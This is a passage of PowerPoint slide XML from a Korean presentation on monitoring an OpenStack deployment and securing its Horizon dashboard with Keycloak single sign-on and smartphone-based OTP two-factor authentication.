            <a:off x="7763256" y="6126732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7934249" y="5954825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07" y="1530627"/>
            <a:ext cx="7524597" cy="4591281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229599" y="1542593"/>
            <a:ext cx="3581705" cy="2087490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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="1542592"/>
            <a:ext cx="45719" cy="2087491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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8401050" y="1786425"/>
            <a:ext cx="285751" cy="285264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9" name="Image 3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483765" y="1840784"/>
            <a:ext cx="110166" cy="175908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8781898" y="1864014"/>
            <a:ext cx="2273198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하이퍼바이저 화면</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8419794" y="2303287"/>
            <a:ext cx="3335731" cy="88334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300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물리자원</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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 통합 모니터링</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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1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 가상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100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머신들에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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 할당된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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VCPU, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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메모리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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 로컬디스크의 전체 사용량과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100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전여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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 용량을 직관적인 그래프로 파악</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1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en-US" altLang="ko-KR" sz="13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3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컴퓨터 노드 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300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하이퍼바이저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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 관리</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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3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1100" dirty="0" err="1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하이퍼바이저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t> 구동 상태와 총 인스턴스 개수를 통합 관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
              <a:cs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70654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905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altLang="ko-KR" sz="13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Keycloak</a:t>
            </a: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을 이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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2</a:t>
            </a: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차 인증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l="-837" r="-837"/>
          <a:stretch/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381304" y="390449"/>
            <a:ext cx="5304601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 kern="0" spc="-75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Openstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" spc="-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 Horizon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3000" b="1" kern="0" spc="-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보안 설정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Infrastructure Overview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381305" y="1547165"/>
            <a:ext cx="6063386" cy="4790541"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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371246" y="153710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371246" y="15371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6258810" y="153710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6429803" y="15371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371246" y="634372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371246" y="6171819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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6258810" y="6342766"/>
            <a:ext cx="190195" cy="2112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6429803" y="6162309"/>
            <a:ext cx="19202" cy="20921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Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371246" y="1327252"/>
            <a:ext cx="2943454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1200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9" name="AutoShape 10" descr="시리즈 | Keycloak - zoonmy.lo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회고하자] Keycloak - Spring Boot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flipV="1">
            <a:off x="429082" y="1647228"/>
            <a:ext cx="5870203" cy="1213023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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19269" y="1550384"/>
            <a:ext cx="5297191" cy="3623882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400507" y="4080674"/>
            <a:ext cx="6029296" cy="2257654"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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40" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400507" y="4080674"/>
            <a:ext cx="38405" cy="2257654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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41" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629107" y="4623828"/>
            <a:ext cx="5009998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43" name="Image 1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29107" y="4805793"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857707" y="4770132"/>
            <a:ext cx="4972507" cy="300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구축 내용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Podman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컨테이너 기반으로 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Keycloak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을 사용하여 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Horizon </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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대시보드 전면에 배치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1045" name="Image 2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29107" y="5212320"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1046" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867232" y="5175744"/>
            <a:ext cx="4771873" cy="2103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작동 원리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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사용자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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172.16.0.131/dashboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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접속 시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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모듈이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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keycloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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/>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US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</a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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로그인 페이지로 리다이렉트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1047" name="Image 3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29107" y="5579833"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857707" y="5581357"/>
            <a:ext cx="4359275" cy="107625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보안 효과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</a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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    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Openstack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내부 계정 정보를 직접 노출하지 않는 외부 인증 체계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확립</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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    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2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차 인증 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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MFA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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보안 확립</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962863" y="4270869"/>
            <a:ext cx="4676242" cy="23865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 dirty="0" err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Openstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Horizon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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보안 강화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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300" b="1" dirty="0" err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Keycloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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연동 인증</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050" name="직사각형 1049"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442927" y="2945976"/>
            <a:ext cx="5887564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200" b="0" i="0" strike="noStrike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SSO와</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="0" i="0" strike="noStrike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200" b="0" i="0" strike="noStrike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MFA를</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="0" i="0" strike="noStrike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200" b="0" i="0" strike="noStrike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지원하는</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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오픈소스</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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200" b="1" i="0" strike="noStrike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기반의</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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200" b="1" i="0" strike="noStrike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통합</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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200" b="1" i="0" strike="noStrike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인증</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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권한</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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200" b="1" i="0" strike="noStrike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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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(IAM) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" i="0" strike="noStrike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솔루션</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" i="0" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:schemeClr val="l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51" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6658432" y="5324182"/>
            <a:ext cx="5258028" cy="1076252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="172132"/>
          </a:solidFill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altLang="ko-KR" sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="CBD5E1"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
              <a:cs typeface="Noto Sans KR"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1052" name="Image 3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37946" y="4314749"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7153123" y="5543576"/>
            <a:ext cx="4658181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172.16.0.131/dashboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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접속 시</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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--&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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200" b="1" dirty="0" err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keycloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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로그인 창으로 넘어옴</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1059" name="Image 1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829882" y="5561180"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600596" y="1365352"/>
            <a:ext cx="2943454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pw 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인증</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1308007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54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</a:rPr>
              <a:t>사용자 인증 보안</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="390449"/>
            <a:ext cx="5304601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 kern="0" spc="-75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Openstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" spc="-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 Horizon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3000" b="1" kern="0" spc="-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보안 설정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0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25454144" descr="EMB000017941632"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="38270"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300087" y="1590140"/>
            <a:ext cx="2204147" cy="3005951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="_x425454224" descr="EMB00001794163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9709" y="1590141"/>
            <a:ext cx="4814422" cy="3005951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2055" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419709" y="4660313"/>
            <a:ext cx="4824098" cy="1829690"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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56" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="427327" y="4660313"/>
            <a:ext cx="38405" cy="1829690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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57" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438529" y="5168807"/>
            <a:ext cx="4804245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058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8308" y="5355789"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2059" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867232" y="5255908"/>
            <a:ext cx="3717187" cy="2333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[Step 1: 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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차 인증</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" err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Keycloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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10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중앙 인증 서버를 통한 사용자 식별</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2060" name="Image 2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8308" y="5762316"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886433" y="5725740"/>
            <a:ext cx="3476017" cy="17007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[Step 2: 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000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차 인증 요청</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000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00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 MFA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000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정책에 따른 추가 인증 단계 강제화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2062" name="Image 3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8308" y="6129829"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2063" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876908" y="6131353"/>
            <a:ext cx="4359275" cy="21229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[Step 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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보안 소유 증명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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사용자 스마트폰 기반의 일회용 비밀번호 생성</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2064" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957826" y="4820865"/>
            <a:ext cx="3626593" cy="23865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단일 패스워드 체계를 넘은 지식</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(PW) +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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소유</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(OTP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2065" name="Image 3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57147" y="4864745"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2066" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428396" y="1384402"/>
            <a:ext cx="3090626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OTP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인증</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2078" name="직사각형 2077"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248699" y="4655120"/>
            <a:ext cx="2642447" cy="9055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800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>계정</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>정보</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>유출</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>시에도</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>물리적</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> OTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>기기</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>없이는</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t>접속</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="굴림"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" i="0" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
